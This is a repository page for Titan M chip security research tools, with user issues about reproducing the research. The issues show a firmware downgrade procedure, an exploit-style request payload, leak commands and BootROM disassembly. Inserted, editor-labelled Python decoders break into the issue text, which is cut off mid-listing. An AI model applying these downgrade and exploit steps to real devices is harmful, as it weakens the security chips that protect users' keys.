Titan M tools

In this repository, we publish the tools we used in our research on the Google Titan M chip.

We presented our results at Black Hat EU 21 and at the ROOTS workshop within DeepSec.

  • citadelimgloader: the Ghidra loader for Titan M firmware files
  • nugget_toolkit: the set of tools to trace messages and communicate with the chip
  • bin2rec: a set of scripts used to convert firmware files into rec files that can be used with the SPI rescue feature
  • BHEU_2021: the materials of our presentation at BlackHat Europe 2021 (the slides and the white paper)

NOTE

This project uses submodules, so after cloning the repository do not forget to run:

$ git submodule update --init --recursive

Comments
  • Bug is not triggered

    I am trying to trigger the bug with the tools out of the box, but it looks like it is not easy to do. As I already mentioned in the previous report, citadeld cannot be stopped on Android 11 (with October patches). The EC image was downgraded, but it is not verified yet that the downgraded version is launched on boot-up. I say "was downgraded" only on the assumption that the 'fastboot oem citadel rescue' command returned the 'OKAY' error code. Now I am trying to dump the Boot ROM. No luck so far. Any leak subcommand returns a fixed 12-byte value:

    ./nosclient leak 0x0 0x16
    08 01 18 01 20 04 2a 04 00 00 00 00
    

    To get more debug information, I modified the frida script to intercept nos_call_application() directly in the 'nosclient' tool. Below is the output:

    11-14 17:00:46.753 21237 21242 D qb_parser: Found sanity function at: 0x6d82e2d90c
    11-14 17:00:46.753 21237 21242 D qb_parser: Hello from the other side
    11-14 17:00:46.753 21237 21242 D qb_parser: Sanity function returned 42
    11-14 17:00:46.887 21237 21237 D qb_parser: appID: 0x5, param: 0xd
    11-14 17:00:46.888 21237 21237 D qb_parser: request: 0x6e699a9010, request_size: 0x1ce
    11-14 17:00:46.888 21237 21237 D qb_parser: reply: 0x6ea99a88a0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.897 21237 21237 D qb_parser: Request:
    11-14 17:00:46.897 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000000  0a c8 03 ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000010  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000020  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000030  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000040  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000050  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000060  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000070  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000080  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000090  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000a0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000b0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000c0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000d0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000e0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000000f0  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000100  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000110  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000120  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000130  ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000140  ff ff ff ff ff ff ff ff ff ff ff 02 00 00 00 17  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000150  00 00 00 01 00 00 00 01 00 00 00 c0 bd f0 ff ff  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000160  ff ff ff ff ff ff ff ff ff ff ff 91 1a 05 00 44  ...............D
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000170  28 01 00 08 69 01 00 34 08 34 08 00 00 00 00 00  (...i..4.4......
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000180  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 00000190  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.897 21237 21237 D qb_parser: 000001c0  00 00 00 00 00 00 00 03 8e 05 00 38 c8 03        ...........8..
    11-14 17:00:46.922 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.922 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.922 21237 21237 D qb_parser: 00000000  88 00 00 00                                      ....
    11-14 17:00:46.922 21237 21237 D qb_parser: Reply size is 136
    11-14 17:00:46.925 21237 21237 D qb_parser: Reply:
    11-14 17:00:46.925 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000000  0a 85 01 08 03 12 80 01 45 30 2d 32 00 00 00 00  ........E0-2....
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.925 21237 21237 D qb_parser: 00000080  00 00 00 00 00 00 00 00                          ........
    11-14 17:00:46.948 21237 21237 D qb_parser: Identity: ICpushReaderCert
    11-14 17:00:46.948 21237 21237 D qb_parser: {
    11-14 17:00:46.948 21237 21237 D qb_parser: 	IN
    11-14 17:00:46.948 21237 21237 D qb_parser: 
    11-14 17:00:46.948 21237 21237 D qb_parser: 	{
    11-14 17:00:46.948 21237 21237 D qb_parser:             x509Cert: "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff02000000170000000100000001000000c0bdf0ffffffffffffffffffffffffff911a050044280100086901003408340800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000038e0500"
    11-14 17:00:46.948 21237 21237 D qb_parser:             publicKeySize: 456
    11-14 17:00:46.948 21237 21237 D qb_parser: 	}
    11-14 17:00:46.948 21237 21237 D qb_parser: 	OUT
    11-14 17:00:46.948 21237 21237 D qb_parser: 
    11-14 17:00:46.948 21237 21237 D qb_parser: 	{
    11-14 17:00:46.948 21237 21237 D qb_parser:             result {
    11-14 17:00:46.948 21237 21237 D qb_parser:               result_code: STATUS_INVALID_DATA
    11-14 17:00:46.948 21237 21237 D qb_parser:               message: "E0-2\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
    11-14 17:00:46.948 21237 21237 D qb_parser:             }
    11-14 17:00:46.948 21237 21237 D qb_parser: 	}
    11-14 17:00:46.948 21237 21237 D qb_parser: }
    11-14 17:00:46.948 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    11-14 17:00:46.949 21237 21237 D qb_parser: appID: 0x0, param: 0x4242
    11-14 17:00:46.949 21237 21237 D qb_parser: request: 0x6e699ad320, request_size: 0x230
    11-14 17:00:46.949 21237 21237 D qb_parser: reply: 0x6ea99a88a0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.958 21237 21237 D qb_parser: Request:
    11-14 17:00:46.958 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000010  65 f9 04 00 e0 7e 01 00 41 41 41 41 41 41 41 41  e....~..AAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000020  41 41 41 41 e3 15 05 00 00 00 00 00 16 00 00 00  AAAA............
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000030  e9 33 06 00 41 41 41 41 41 41 41 41 65 fe 04 00  .3..AAAAAAAAe...
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000040  41 41 41 41 41 41 41 41 41 41 41 41 65 f9 04 00  AAAAAAAAAAAAe...
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000050  48 df 01 00 41 41 41 41 41 41 41 41 41 41 41 41  H...AAAAAAAAAAAA
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000060  e3 15 05 00 00 00 00 00 16 00 00 00 99 07 05 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000070  41 41 41 41 41 41 41 41 65 fe 04 00 00 00 00 00  AAAAAAAAe.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000080  41 41 41 41 41 41 41 41 b1 67 04 00 c1 dc 82 86  AAAAAAAA.g......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000090  8a 97 e8 da c0 35 4a db 7f 00 00 00 50 89 78 7f  .....5J.....P.x.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000a0  5f 00 00 00 00 00 00 00 00 00 00 00 00 7f 78 7f  _.............x.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000b0  5f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  _...............
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000c0  00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000d0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000e0  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000000f0  00 00 00 00 20 95 9b b9 6d 00 00 00 00 00 00 00  .... ...m.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000100  00 00 00 00 10 95 9b b9 6d 00 00 00 00 00 00 00  ........m.......
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000110  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000120  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000130  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000140  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000150  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000160  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000170  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000180  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000190  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001a0  00 00 00 00 b8 34 4a db 7f 00 00 00 b8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001b0  7f 00 00 00 b8 34 4a db 7f 00 00 00 b8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001c0  7f 00 00 00 40 8a 0c 1f 00 00 00 00 d8 34 4a db  [email protected]
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001d0  7f 00 00 00 b8 34 4a db 7f 00 00 00 f8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001e0  7f 00 00 00 f8 34 4a db 7f 00 00 00 f8 34 4a db  .....4J......4J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 000001f0  7f 00 00 00 f8 34 4a db 7f 00 00 00 98 35 4a db  .....4J......5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000200  7f 00 00 00 78 35 4a db 7f 00 00 00 58 35 4a db  ....x5J.....X5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000210  7f 00 00 00 38 35 4a db 7f 00 00 00 18 35 4a db  ....85J......5J.
    11-14 17:00:46.958 21237 21237 D qb_parser: 00000220  7f 00 00 00 f8 34 4a db 7f 00 00 00 08 33 4a db  .....4J......3J.
    11-14 17:00:46.971 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.971 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.971 21237 21237 D qb_parser: 00000000  00 00 00 00                                      ....
    11-14 17:00:46.971 21237 21237 D qb_parser: Reply size is 0
    11-14 17:00:46.971 21237 21237 D qb_parser: Nugget: No handler yet for function #16962
    11-14 17:00:46.971 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    11-14 17:00:46.972 21237 21237 D qb_parser: appID: 0x1, param: 0x0
    11-14 17:00:46.972 21237 21237 D qb_parser: request: 0x6e699a9010, request_size: 0x0
    11-14 17:00:46.972 21237 21237 D qb_parser: reply: 0x6ea99ab9c0, reply_size_addr: 0x7fdb4a2df4
    11-14 17:00:46.972 21237 21237 D qb_parser: Request has null size
    11-14 17:00:46.986 21237 21237 D qb_parser: Reply size:
    11-14 17:00:46.986 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.986 21237 21237 D qb_parser: 00000000  0c 00 00 00                                      ....
    11-14 17:00:46.986 21237 21237 D qb_parser: Reply size is 12
    11-14 17:00:46.987 21237 21237 D qb_parser: Reply:
    11-14 17:00:46.987 21237 21237 D qb_parser:            0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    11-14 17:00:46.987 21237 21237 D qb_parser: 00000000  08 01 18 01 20 04 2a 04 00 00 00 00              .... .*.....
    11-14 17:00:46.998 21237 21237 D qb_parser: AVB: GetState
    11-14 17:00:46.998 21237 21237 D qb_parser: {
    11-14 17:00:46.998 21237 21237 D qb_parser: 	IN
    11-14 17:00:46.998 21237 21237 D qb_parser:  {}
    11-14 17:00:46.998 21237 21237 D qb_parser: 	OUT
    11-14 17:00:46.998 21237 21237 D qb_parser: 
    11-14 17:00:46.998 21237 21237 D qb_parser: 	{
    11-14 17:00:46.998 21237 21237 D qb_parser:             version: 1
    11-14 17:00:46.998 21237 21237 D qb_parser:             production: true
    11-14 17:00:46.998 21237 21237 D qb_parser:             number_of_locks: 4
    11-14 17:00:46.998 21237 21237 D qb_parser:             locks: "00000000"
    11-14 17:00:46.998 21237 21237 D qb_parser: 	}
    11-14 17:00:46.998 21237 21237 D qb_parser: }
    11-14 17:00:46.998 21237 21237 D qb_parser: ------------------------------------------------------------------------------------------------------
    
    

    Any idea why the bug is not triggered? Bad EC image stored in the Titan M?

    opened by NewDwarf 12
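The fixed 12-byte value returned in the trace above (08 01 18 01 20 04 2a 04 00 00 00 00) is a protobuf message, and the trace itself decodes it as the AVB GetState reply. The Python below is an example added by the editor, not code from the Titan M tools repository: it rebuilds the raw buffer from qb_parser hexdump lines and walks the protobuf wire format without a schema, so the same check can be applied to any request or reply in such a trace (the 136-byte ICpushReaderCert reply is decoded the same way, as a nested message). The mapping of GetState field numbers to names (1=version, 3=production, 4=number_of_locks, 5=locks) is inferred from the order in which the trace prints them and is an assumption, not taken from the protocol definition.

```python
import re

# Constructed input: the hexdump line of the 12-byte reply to the appID 0x1
# call, copied from the qb_parser trace in the issue above.
TRACE_REPLY_12 = [
    "11-14 17:00:46.987 21237 21237 D qb_parser: 00000000  08 01 18 01 20 04 2a 04 00 00 00 00              .... .*.....",
]

# Constructed input: the 136-byte reply to the appID 0x5 call from the same
# trace, rebuilt as bytes ("E0-2" followed by 124 zero bytes in the message).
TRACE_REPLY_136 = bytes.fromhex("0a8501" "0803" "128001") + b"E0-2" + b"\x00" * 124

HEXDUMP_RE = re.compile(r"qb_parser: ([0-9a-f]{8})  ((?:[0-9a-f]{2} )+)")


def parse_qb_hexdump(lines):
    """Rebuild the raw buffer from qb_parser hexdump lines. Offsets must be
    contiguous, so a dropped line raises instead of yielding a shifted buffer."""
    out = bytearray()
    for line in lines:
        m = HEXDUMP_RE.search(line)
        if not m:
            continue  # column header, "Reply size" and other non-hexdump lines
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"hexdump gap: expected offset {len(out):#x}, got {offset:#x}")
        out += bytes.fromhex(m.group(2))
    return bytes(out)


def read_varint(buf, pos):
    """Decode a base-128 varint starting at pos; returns (value, new_pos)."""
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7
        if shift > 63:
            raise ValueError("varint too long")


def decode_protobuf(buf):
    """Walk the protobuf wire format without a schema.
    Returns a list of (field_number, wire_type, value) triples."""
    fields, pos = [], 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field, wire = key >> 3, key & 7
        if wire == 0:                       # varint
            value, pos = read_varint(buf, pos)
        elif wire in (1, 5):                # 64-bit / 32-bit fixed
            size = 8 if wire == 1 else 4
            if pos + size > len(buf):
                raise ValueError("truncated fixed-width field")
            value = int.from_bytes(buf[pos:pos + size], "little")
            pos += size
        elif wire == 2:                     # length-delimited: bytes, string or nested message
            length, pos = read_varint(buf, pos)
            if pos + length > len(buf):
                raise ValueError("length-delimited field runs past end of buffer")
            value = buf[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire}")
        fields.append((field, wire, value))
    return fields


# Assumed mapping of GetState field numbers to names, taken from the order in
# which the trace prints them; it is not from the protocol definition.
GET_STATE_FIELDS = {1: "version", 3: "production", 4: "number_of_locks", 5: "locks"}


def describe_get_state(buf):
    """Render the AVB GetState reply the way the trace printed it."""
    out = {}
    for field, wire, value in decode_protobuf(buf):
        name = GET_STATE_FIELDS.get(field, f"field_{field}")
        if name == "production":
            out[name] = bool(value)
        elif wire == 2:
            out[name] = value.hex()         # the trace shows locks as "00000000"
        else:
            out[name] = value
    return out


if __name__ == "__main__":
    print(describe_get_state(parse_qb_hexdump(TRACE_REPLY_12)))
    outer = decode_protobuf(TRACE_REPLY_136)
    print(outer[0][:2], decode_protobuf(outer[0][2]))
```

Running the decoder over the 136-byte reply gives an outer field 1 (length 133) whose content decodes to field 1 = 3 and a 128-byte field 2 starting with "E0-2", which is the result_code / message pair the trace labels STATUS_INVALID_DATA. Decoding the 12-byte reply gives exactly the version/production/number_of_locks/locks values the trace printed, which is why it is the same regardless of the leak arguments: the trace shows the preceding call (appID 0x0, param 0x4242) answered with "No handler yet for function #16962" and zero reply bytes.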
  • Does this research mean that Titan M is compromised?

    The short answer is "No". This research missed one important feature, which is the key ladder's 'key manager'. This key manager is a part of the silicon which, at least, sideloads the AES and HMAC keys into the internal key storage registers, which are not visible to any part of the software and not accessible via JTAG. To derive the real key inside the key manager block, many personalization inputs are used, like the DeviceID, the Root key, and other hardware secrets. Some of them are stored in OTP, but some are implemented as a gate array. Moreover, the bus to this gate array is scrambled to obfuscate optical reverse engineering of the hardware. Internally, the key manager uses KMAC to derive the hidden keys inside the key ladder. This means that the Titan M is still safe. A SW bug to be found, and knowledge of the data transferred between the Titan M and the application processor, are almost nothing for breaking the security of the Titan M, as the key ladder's security is still not compromised. This is good news, as originally, after reading the presentation and white paper, I wondered how Google could make such a fatal mistake in the security design.

    opened by NewDwarf 8
  • 'Firmware Downgrade with SPI Rescue' question

    Hi. I am going to play with this awesome project. But before, I would like to clarify some things.

    If I understood correctly, to downgrade the EC image I have to download the "11.0.0 (RP1A.200720.009, Sep 2020)" image, unpack it, mount the 'vendor' partition, extract 'ec.rec' from there and then push it to the device by means of the fastboot tool? UPDATE: I just found that the EC version which has the required bugs is in the "11.0.0 RQ1A.210105.003, Jan 2021" factory image. ec.bin from that image contains the string brick_v0.0.8232-b1e3ea340 2020-09-25 16:57:52 wfrichar, which matches the reported one. The log of flashing the EC image:

    $ fastboot stage ec.rec 
    Sending 'ec.rec' (185 KB)                          OKAY [  0.119s]
    Finished. Total time: 0.210s
    $ fastboot oem citadel rescue
                                                       (bootloader) Recovering citadel - it may take a couple of minutes
    OKAY [ 28.708s]
    Finished. Total time: 28.710s
    

    At first glance, the image was written successfully. Are there options to verify from userspace that the required image indeed runs? The /vendor/bin/hw/citadel_updater command doesn't work for this purpose.

    blueline:/data/local/tmp # /vendor/bin/hw/citadel_updater -l                                                                                                                        
    ERROR: Unable to connect
    ERROR: execute_command failed(1)!
    

    AOSP has the following comment/code:

        // Citadel info (only enabled on -eng and -userdebug builds)
        if (!PropertiesHelper::IsUserBuild()) {
            RunCommandToFd(fd, "Citadel ID", {"/vendor/bin/hw/citadel_updater", "--id"});
            RunCommandToFd(fd, "Citadel VER", {"/vendor/bin/hw/citadel_updater", "-lv"});
            RunCommandToFd(fd, "Citadel SELFTEST", {"/vendor/bin/hw/citadel_updater", "--selftest"});
        }
    

    Could you please describe in more detail how the firmware update based on the nugget task works? The presentation describes briefly how the firmware is updated by means of the nugget task. The unclear part is which app (from the userspace level) triggers the firmware update.

    Thanks.

    opened by NewDwarf 8
  • Another inaccuracy in the EU-21-Rossi_Bellom-2021_A_Titan_M_Odyssey.pdf paper

    Sorry, guys, for reporting more issues. Maybe they exist for some reason (Google asked, or something else). The presentation describes an incorrect range of the key blob structure which should be encrypted. The claimed range is 0x2c0 - 0x3c4. Actually, this range is 0x2c0 - 0x5e0. That looks weird (as it no longer looks like a typo), but you missed the padding (the 0xdc... array) from this range.

    opened by NewDwarf 4
  • BootROM reversing

    I began reversing the dumped BootROM. If I identified it correctly, the entry point of the BootROM is:

    ROM:00001498             sub_1498
    ROM:00001498 00 21                       MOVS    R1, #0
    ROM:0000149A 0A 46                       MOV     R2, R1
    ROM:0000149C 0B 46                       MOV     R3, R1
    ROM:0000149E 0C 46                       MOV     R4, R1
    ROM:000014A0 0D 46                       MOV     R5, R1
    ROM:000014A2 0E 46                       MOV     R6, R1
    ROM:000014A4 0F 46                       MOV     R7, R1
    ROM:000014A6 88 46                       MOV     R8, R1
    ROM:000014A8 89 46                       MOV     R9, R1
    ROM:000014AA 8A 46                       MOV     R10, R1
    ROM:000014AC 8B 46                       MOV     R11, R1
    ROM:000014AE 8C 46                       MOV     R12, R1
    ROM:000014B0 00 48                       LDR     R0, =0x14B9
    ROM:000014B2 00 47                       BX      R0              ; loc_14B8
    ROM:000014B2             ; End of function sub_1498
    

    The BootROM actively uses the high addresses 0xe0000000 ... These addresses are defined as CPU registers. What are these registers actually?

    ROM:00001A8C             sub_1A8C                                ; CODE XREF: ROM:000014BC↑p
    ROM:00001A8C 06 4A                       LDR     R2, =0xE000EDFC
    ROM:00001A8E 13 68                       LDR     R3, [R2]
    ROM:00001A90 03 F0 7E 43                 AND.W   R3, R3, #0xFE000000
    ROM:00001A94 43 F0 80 73                 ORR.W   R3, R3, #0x1000000
    ROM:00001A98 13 60                       STR     R3, [R2]
    ROM:00001A9A 04 4A                       LDR     R2, =0xE0001000
    ROM:00001A9C 13 68                       LDR     R3, [R2]
    ROM:00001A9E 43 F0 01 03                 ORR.W   R3, R3, #1
    ROM:00001AA2 13 60                       STR     R3, [R2]
    ROM:00001AA4 70 47                       BX      LR
    ROM:00001AA4             ; End of function sub_1A8C
    

    Another high address range, 0x40000000 ..., is defined as HW registers. Do I understand correctly that these are timers, the watchdog, global control registers to configure, say, access to memory regions, RSA HW accelerator registers, etc.?

    ROM:00001B5C             sub_1B5C                                ; CODE XREF: sub_1B70:loc_1B7E↓p
    ROM:00001B5C                                                     ; sub_1BE4+14↓p ...
    ROM:00001B5C 03 4B                       LDR     R3, =0x40320030
    ROM:00001B5E 18 68                       LDR     R0, [R3]
    ROM:00001B60 80 F0 04 00                 EOR.W   R0, R0, #4
    ROM:00001B64 C0 F3 80 00                 UBFX.W  R0, R0, #2, #1
    ROM:00001B68 70 47                       BX      LR
    ROM:00001B68             ; End of function sub_1B5C
    ROM:00001B68
    ROM:00001B68             ; ---------------------------------------------------------------------------
    ROM:00001B6A 00                          DCB    0
    ROM:00001B6B BF                          DCB 0xBF
    ROM:00001B6C 30 00 32 40 off_1B6C        DCD 0x40320030          ; DATA XREF: sub_1B5C↑r
    

    If you have already identified the purpose of some HW and CPU registers, could you share it, please?

    opened by NewDwarf 4
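The 0xE000xxxx addresses asked about above are the ARMv7-M System Control Space, which is architectural (defined by Arm) rather than specific to Titan M: 0xE000EDFC is DEMCR, whose bit 24 is TRCENA, and 0xE0001000 is DWT_CTRL, whose bit 0 is CYCCNTENA. The Python below is an example added by the editor, not code from the repository or from the researchers: it walks an IDA-style listing such as sub_1A8C, follows literal-pool addresses through LDR/AND/ORR/STR, and names the register and bits each access touches, so a boot-time read-modify-write sequence can be reviewed at a glance. The SCS table is a small subset of the architectural registers; the 0x4xxxxxxx peripheral map is chip specific and is deliberately left unnamed.

```python
import re

# ARMv7-M System Control Space registers (architectural, defined by Arm; not
# Titan M specific). A subset, with the bit names used below.
SCS_REGS = {
    0xE000E010: ("SYST_CSR", {0: "ENABLE", 1: "TICKINT", 2: "CLKSOURCE"}),
    0xE000ED08: ("VTOR", {}),
    0xE000ED0C: ("AIRCR", {}),
    0xE000ED24: ("SHCSR", {}),
    0xE000ED88: ("CPACR", {}),
    0xE000ED94: ("MPU_CTRL", {0: "ENABLE", 1: "HFNMIENA", 2: "PRIVDEFENA"}),
    0xE000EDFC: ("DEMCR", {24: "TRCENA"}),
    0xE0001000: ("DWT_CTRL", {0: "CYCCNTENA"}),
}

# Constructed input: the sub_1A8C and sub_1B5C listings from the issue above.
LISTING_1A8C = """
ROM:00001A8C             sub_1A8C                                ; CODE XREF: ROM:000014BC
ROM:00001A8C 06 4A                       LDR     R2, =0xE000EDFC
ROM:00001A8E 13 68                       LDR     R3, [R2]
ROM:00001A90 03 F0 7E 43                 AND.W   R3, R3, #0xFE000000
ROM:00001A94 43 F0 80 73                 ORR.W   R3, R3, #0x1000000
ROM:00001A98 13 60                       STR     R3, [R2]
ROM:00001A9A 04 4A                       LDR     R2, =0xE0001000
ROM:00001A9C 13 68                       LDR     R3, [R2]
ROM:00001A9E 43 F0 01 03                 ORR.W   R3, R3, #1
ROM:00001AA2 13 60                       STR     R3, [R2]
ROM:00001AA4 70 47                       BX      LR
ROM:00001AA4             ; End of function sub_1A8C
"""
LISTING_1B5C = """
ROM:00001B5C 03 4B                       LDR     R3, =0x40320030
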